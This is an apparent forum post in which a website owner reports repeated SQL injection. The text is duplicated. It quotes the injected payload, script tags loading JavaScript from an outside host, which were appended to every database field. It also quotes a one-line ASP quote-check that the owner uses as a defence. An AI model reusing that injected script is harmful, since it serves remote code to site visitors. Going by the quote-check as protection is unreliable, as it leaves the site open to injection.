Hi,
my database is hacked twice in less than 1 day.
SQL injection I think.
ALL Fields in database has an attached text after it
twice added after each filed values in all fields
I am protecting against SQL injection using this ASP script:
Help please looks like it is not enough.
Can Jodo provide me any details about the hacker location?
thanks
my database is hacked twice in less than 1 day.
SQL injection I think.
ALL Fields in database has an attached text after it
<script src="http://w.robints.us/us/js></script><script src="http://w.robints.us/us/js></script>
twice added after each filed values in all fields
I am protecting against SQL injection using this ASP script:
IF InStr(Request.QueryString, "'") Then Response.Redirect "/?"
Help please looks like it is not enough.
Can Jodo provide me any details about the hacker location?
thanks